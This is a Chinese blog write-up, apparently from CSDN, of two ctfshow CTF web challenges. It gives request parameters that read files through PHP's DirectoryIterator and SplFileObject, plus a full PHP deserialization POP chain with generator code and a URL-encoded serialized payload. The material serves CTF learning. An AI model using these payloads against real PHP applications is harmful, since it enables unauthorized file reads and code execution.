ctfshow-卷王杯

最新推荐文章于 2024-05-01 21:49:37 发布
最新推荐文章于 2024-05-01 21:49:37 发布
阅读量777 收藏 1
点赞数
文章标签: php 开发语言 后端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/blowed/article/details/123194107
版权

easywebeasy unserialize

easyweb

源码提示

</div>
<!--?source-->
</html>

数组溢出+原生类读取

c=9223372036854775806&a=DirectoryIterator&b=glob://flag[0-9a-z]*.php

c=9223372036854775806&a=SplFileObject&b=flag56ea8b83122449e814e0fd7bfb5f220a.php

 

easy unserialize

__destruct()方法又叫析构函数,当程序结束销毁的时候自动调用,看下这道题中的代码

$a=unserialize($_GET['ctfshow']);
throw new Exception("高一新生报道");

这里有个throw函数,大概是抛出一个异常,然后让程序异常退出,这个时候就是未正常退出的情况,所以不会调用__destruct方法,这里我们就要想办法在throw函数执行之前调用析构函数,目前我知道的调用该函数的方法如下:

  • 等待程序完整执行完毕,也就是解释完最后一行代码,这也是我们最常用的方法

  • 利用GC回收机制,比如

<?php
highlight_file(__FILE__);
class Demo{
        public function __destruct()
        {
                echo "Running method <destruct>";
        }
}
$a=new Demo();
// $a=null;
throw new Error("this is a test");
​

  • 最后一种就是利用unset()主动销毁,这里显然我们不能,所以忽略

不难发现我们最后要进入 one::MeMeMe 并且满足条件

array_walk()只有关于数组的例子 本地尝试一下关于类的例子

 

可以看到作用是遍历自定义函数,其中$fn为成员的值,prev为成员变量的名字,所以

$year_parm=array(0=>"Happy_func");

要访问one::MeMeME() 找到

public function __get($name) {
        $var = $this->$name;
        $var[$name]();
    }

使 $var=array('$name'=>[new one(),"MeMeMe"]); 就可以 $var[$name]=one::MeMeMe();

要想__get() 得访问不存在的成员属性 找到

public function __toString() {
        return $this->object->string;
    }
   使 $this->object=new third()

而要__toString 得把对象当字符数输出 找到

 protected function addMe() {
        return "Wow you have sovled".$this->filename;
    }
   
   使 $this->filename=new one()即可;
   这里题目是protected 利用php7对protected 不敏感 绕过

发现

 public function __destruct() {
        @$this->object->add();
    }
   使$this->object=new second()即可

payload:

<?php
class one {
    public $object;
    public $year_parm=array(0=>"Happy_func");
    public function MeMeMe() {
        array_walk($this, function($fn, $prev){
            if ($fn[0] === "Happy_func" && $prev === "year_parm") {
                echo $fn[0].'<br>'.$prev;
​
                global $flag;
                echo $flag;
            }
        });
    }
​
    public function __destruct() {
        @$this->object->add();
    }
​
    public function __toString() {
        echo 'one::toString'.'<br>';
        return $this->object->string;
    }
}
​
class second {
    public $filename;
​
    protected function addMe() {
        echo 'second::addMe'.'<br>';
        return "Wow you have sovled".$this->filename;
    }
​
    public function __call($func, $args) {
        echo 'second::call'.'<br>';
        call_user_func([$this, $func."Me"], $args);
    }
}
​
class third {
    private $string;
​
    public function __construct($string) {
        $this->string = $string;
    }
​
    public function __get($name) {
        echo 'third::get'.'<br>';
        $var = $this->$name;
        $var[$name]();
    }
}
  $a=new one();
  $a->object=new second();
  $a->object->filename=new one();
  $a->object->filename->object=new third(['string'=>[new one(),'MeMeMe']]);
  $b=null;
  $c=array($a,$b);
  echo urlencode(serialize($c));
  

本地调试没问题

 

因为要在throw之前析构函数

所以payload还要修改一下最终为:

a%3A2%3A%7Bi%3A0%3BO%3A3%3A%22one%22%3A2%3A%7Bs%3A6%3A%22object%22%3BO%3A6%3A%22second%22%3A1%3A%7Bs%3A8%3A%22filename%22%3BO%3A3%3A%22one%22%3A2%3A%7Bs%3A6%3A%22object%22%3BO%3A5%3A%22third%22%3A1%3A%7Bs%3A13%3A%22%00third%00string%22%3Ba%3A1%3A%7Bs%3A6%3A%22string%22%3Ba%3A2%3A%7Bi%3A0%3BO%3A3%3A%22one%22%3A2%3A%7Bs%3A6%3A%22object%22%3BN%3Bs%3A9%3A%22year_parm%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A10%3A%22Happy_func%22%3B%7D%7Di%3A1%3Bs%3A6%3A%22MeMeMe%22%3B%7D%7D%7Ds%3A9%3A%22year_parm%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A10%3A%22Happy_func%22%3B%7D%7D%7Ds%3A9%3A%22year_parm%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A10%3A%22Happy_func%22%3B%7D%7Di%3A0%3BN%3B%7D

 

Fnylad
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CTFshow-王杯-简单的re(复现)
ookami6497的博客
03-19 1195
普通的upx壳,放kali里面脱下壳就行 运行 进入主函数 __int64 sub_401165() { int v0; // edx int v1; // ecx int v2; // er8 int v3; // er9 __int64 result; // rax __int64 v5; // [rsp+8h] [rbp-1018h] char v6[112]; // [rsp+10h] [rbp-1010h] BYREF int v7; // [rs..
CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$
03-04
CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$
2020第十三届全国大学生信息安全竞赛大部分题目
08-22
除了pwn类题和web的easy_unserialize全都有
2022/03/14ctfshow王杯easy unserialize
A的博客
03-14 373
public function MeMeMe() { array_walk($this, function($fn, $prev){ if ($fn[0] === "Happy_func" && $prev === "year_parm") { global $talk; echo "$talk"."</br>"; global $flag; echo $fla
2024年网络安全最新ctfshow王杯——easy unserialize_王杯 easy unseriliz
最新发布
2401_84281738的博客
05-01 18
__toString():$this->object->string -> 读取不可访问属性触发get()this->object->add() ->调用一个不存在的方法触发call()this, $func.“Me”], $args) ->调用addMe()throw new Exception(“高一新生报道”);this->filename ->触发toString()name]() ->调用one:MeMeMe()
ctfshow(王杯)
qq_62046696的博客
09-24 1459
首先我们的前提是if(isset($_POST['a']) && isset($_POST['b']) && isset($_POST['c']))} 这里的name就是上面的string传进来的,但是 $var = $this->$name;array_walk函数的作用就是遍历自定义函数,其中$fn的值为成员的值,prev为成员变量的名字。这是个等于号,相当于赋值,而对于数组无法赋值的情况就是当键溢出就行,可以看到上一句有。如果是数组的话,第一个是类,第二个是方法,第三个是属性。
王杯 easy unserialize
qq_64201116的博客
10-19 683
因为一个没学过,所以没解出来。要输出flag,就要调用方法一眼看过去,魔术方法__get里面的都可控,可以利用。
CTFSHOW[王杯](上)
errorr0
03-19 2919
ctfshow王杯
CTFshow王杯 | just pwn
rencvn的划水
03-06 642
开学期间太无聊了,和室友一起刷题,由于之前底子不好,卡住了一段时间,写写记录一下。 检查文件保护机制 开启了relro,pie和canary 将程序扔进ida里分析 找到main函数,想进行f5反汇编,但是报错无法逆出反汇编 错误具体原因出现在0x1257,我们跟进查看 这里时call rdx,在看上面的汇编 lea rdx,[rbp+buf] 实际上是将我们写如的内容进行call的操作,这里我在使用gdb调试的时候发现 栈可执行,并且栈上存在/bin/sh字符串 ...
ctfshow王杯
as you know, nlp is fantasitc!
03-05 559
ctfshow王杯 写在前面:这次的做出一道php题,通过这次的比赛,深入理解反序列化漏洞,通过复现学到了很多新的点 参考一篇特别详细的wp eazy unserialize(复现) 源码 <?php include("./HappyYear.php"); class one { public $object; public function MeMeMe() { array_walk($this, function($fn, $prev){
2022-王杯-happyFastjson
feng的博客
03-02 1772
2022-王杯-happyFastjson 前言 昨天看了fastjson,因为最近比赛的fastjson出现的有点多。王杯Y4出了道fastjson的题目,考点是比较基础的东西,学习一波。 分析 import java.io.ByteArrayOutputStream; import java.io.InputStream; import java.util.HashMap; import java.util.Map; public class FlagBean { private int
ctfshow王杯部分web
Pysnow's Blog
02-27 5378
ctfshow王杯web部分[easy unserialize&easy web] easy unserialize <?php /** * @Author: F10wers_13eiCheng * @Date: 2022-02-01 11:25:02 * @Last Modified by: F10wers_13eiCheng * @Last Modified time: 2022-02-07 15:08:18 */ include("./HappyYear.php");
ctfshow-web41~60-WP
02-21
ctfshow-web41~60-WPctfshow-web41~60-WP
ctfshow-VIP题目-Web-详细解题思路
01-27
ctfshow-VIP题目-Web-详细解题思路
CTFShow-周末大挑战parse-url篇Writeup
05-19
CTFShow--周末大挑战parse_url篇Writeup
ctfshow web189 无单引号,利用回显不同,盲注
10-21
ctfshow web189 无单引号,利用回显不同,盲注
CTfshow 王杯 easy unserialize(特详)
Jay17的博客
05-12 490
CTfshow 王杯 easy unserialize(特详)
王杯easy unserialize
……
01-13 128
王杯web easy unserialize
ctfshow-web-web红包题
07-14
ctfshow-web-web红包题是一道CTF比赛中的网络安全题目。这道题目的背景是一个在线购物网站,要求我们通过安全漏洞来获得网站的红包。 首先,我们可以检查网站的源代码,寻找可能存在的漏洞。在网站的前端页面中,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值